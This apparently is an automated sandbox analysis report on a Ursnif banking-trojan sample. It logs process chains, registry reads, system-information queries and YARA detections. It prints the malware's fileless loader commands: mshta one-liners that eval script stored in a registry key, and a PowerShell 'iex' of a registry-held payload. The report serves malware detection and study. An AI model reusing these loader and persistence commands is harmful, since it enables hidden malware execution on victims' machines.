Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pksv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pksv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313FF06 cpuid 0_2_0313FF06
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6DD81813
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312C420 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0312C420
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD81983 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6DD81983
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313FF06 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_0313FF06
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD81262 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6DD81262
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif